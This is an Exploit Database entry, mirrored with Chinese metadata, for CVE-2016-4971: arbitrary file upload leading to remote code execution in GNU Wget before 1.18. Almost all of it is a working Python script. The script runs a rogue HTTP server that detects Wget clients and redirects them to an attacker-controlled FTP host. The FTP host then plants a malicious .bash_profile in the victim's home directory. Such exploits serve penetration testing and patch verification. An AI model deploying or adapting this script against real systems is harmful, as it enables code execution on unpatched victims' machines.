GNU Wget < 1.18 - Arbitrary File Upload (2)

• Exploit Database
• 41 阅读

• 作者： liewehacksie
  日期： 2021-04-30
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49815/

• # Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
  # Original Exploit Author: Dawid Golunski
  # Exploit Author: liewehacksie
  # Version: GNU Wget < 1.18 
  # CVE: CVE-2016-4971
  
  import http.server
  import socketserver
  import socket
  import sys
  
  class wgetExploit(http.server.SimpleHTTPRequestHandler):
  
   def do_GET(self):
   # This takes care of sending .wgetrc/.bash_profile/$file
  
   print("We have a volunteer requesting " + self.path + " by GET :)\n")
   if "Wget" not in self.headers.get('User-Agent'):
  print("But it's not a Wget :( \n")
  self.send_response(200)
  self.end_headers()
  self.wfile.write("Nothing to see here...")
  return
  
   self.send_response(301)
   print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
   new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
  
   print("Sending redirect to %s \n"%(new_path))
   self.send_header('Location', new_path)
   self.end_headers()
  
  
  HTTP_LISTEN_IP = '192.168.72.2'
  HTTP_LISTEN_PORT = 80
  FTP_HOST = '192.168.72.4'
  FTP_PORT = 2121
  FILE = '.bash_profile'
  
  handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
  
  print("Ready? Is your FTP server running?")
  
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  result = sock.connect_ex((FTP_HOST, FTP_PORT))
  if result == 0:
   print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
  else:
   print("FTP is down :( Exiting.")
   exit(1)
  
  print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
  
  handler.serve_forever()